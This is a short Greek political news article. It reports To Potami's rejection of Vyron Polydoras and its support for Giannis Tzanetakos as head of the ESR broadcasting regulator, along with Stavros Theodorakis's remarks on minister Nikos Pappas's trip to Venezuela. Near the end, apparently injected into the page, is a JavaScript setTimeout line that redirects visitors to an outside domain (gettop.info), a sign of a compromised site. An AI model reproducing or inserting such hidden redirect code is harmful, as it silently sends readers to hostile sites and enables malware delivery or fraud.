Ποτάμι: «Όχι» σε Πολύδωρα, «ναι» σε Τζανετάκο

0
11

 

Η Κοινοβουλευτική Ομάδα του Ποταμιού συνεδρίασε το μεσημέρι στη Βουλή προκειμένου να καθορίσει τη στάση του κόμματος στην απογευματινή Διάσκεψη των Προέδρων της Βουλής. Σύμφωνα με τις αποφάσεις, το κόμμα δεν αποδέχεται τον Βύρωνα Πολύδωρα για τη θέση του προέδρου του ΕΣΡ, προκρίνοντας ως καλύτερη λύση τον δημοσιογράφο Γιάννη Τζανετάκο.

Επίσης δεν θεωρεί ως κατάλληλη βάση για τη ρύθμιση του τηλεπτικού τοπίου τον νόμο Παππά.

Μετά την ολοκλήρωση της συνεδρίασης, ο κ. Σταύρος Θεοδωράκης δήλωσε:«Το Ποτάμι θα επιμείνει στην πρότασή του για συγκρότηση του ΕΣΡ χωρίς πρόσωπα από το παλιό κομματικό παρελθόν. Η ΚΟ του Ποταμιού συζήτησε και εκτίμησε ότι μία καλή λύση θα ήταν αυτήν τη στιγμή ο Γιάννης Τζαννετάκος. Καλούμε τα άλλα κόμματα να ανοίξουν κι αυτά τα χαρτιά τους».

Αναφορικά με τις αρμοδιότητες του ΕΣΡ, τόνισε: «Το ένα θέμα είναι το ΕΣΡ, το άλλο είναι τι θα κληθεί να εφαρμόσει το ΕΣΡ. Εμείς λέμε ότι δεν είναι βάση ο νόμος Παππά, έχει καταπέσει στη συνείδηση της κοινωνίας και, βέβαια, δεν τον αποδεχόμαστε. Επιμένουμε, περισσότερα κανάλια, περισσότεροι εργαζόμενοι και περισσότερα λεφτά στα δημόσια ταμεία.

Όσον αφορά στο ταξίδι του υπουργού Επικρατείας Νίκου Παππά με τον Κύπριο δικηγόρο Αρτέμιο Αρτεμίου στη Βενεζουέλα ο κ. Θεοδωράκης σχολίασε πως «είναι σαφές. Στη Βενεζουέλα δεν πας για διακοπές»

Όπως είπε χαρακτηριστικά: «Είναι νομίζω σαφές ότι στη Βενεζουέλα δεν πας για διακοπές. Στη Βενεζουέλα πας για δουλειές. Και θα πρέπει να μας εξηγήσει ο κ. Παππάς τι δουλειές είχε σε ένα μυστικό μάλιστα ταξίδι κι όταν συνοδευόταν από έναν άνθρωπο που έχει χαρακτηριστεί ως ο ‘κύριος offshore της’ Κύπρου. Εμείς και στο παρελθόν έχουμε ασχοληθεί με τα ταξίδια κυβερνητικών στελεχών στη Βενεζουέλα, είχαν μια αδυναμία και θα πρέπει να δώσουν απαντήσεις όταν μάλιστα στην Ευρώπη συζητούν ότι κατ’ εποχές το καθεστώς Τσάβες και μετά το καθεστώς Μαδούρο ενίσχυε κόμματα που θεωρούσαν φιλικά προς αυτό» ανέφερε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here